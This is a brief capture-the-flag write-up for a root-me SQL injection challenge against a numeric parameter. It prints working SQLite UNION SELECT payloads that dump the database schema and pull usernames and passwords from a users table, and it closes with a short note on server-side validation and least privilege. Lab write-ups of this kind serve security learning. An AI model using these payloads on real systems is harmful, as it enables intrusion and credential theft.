SQL injection: numeric¶

root-me challenge: SQL-injection-Numeric: Retrieve the administrator password.

news_id=1' UNION SELECT NULL --

SQLite3::query()

Using PayloadAllTheThings: SQLiteInjection:

news_id=1 UNION SELECT NULL,sql,NULL FROM sqlite_master --

news_id=1 UNION SELECT NULL,username,password FROM users --

Techniques¶

• SQL injection

• Server-side injection runbook

Counter moves¶

SQL injection: numeric is the variant in play. Server-side validation and least privilege are what these reduce to. Seen from the other side, this sits in the blue notes on the application layer as a target.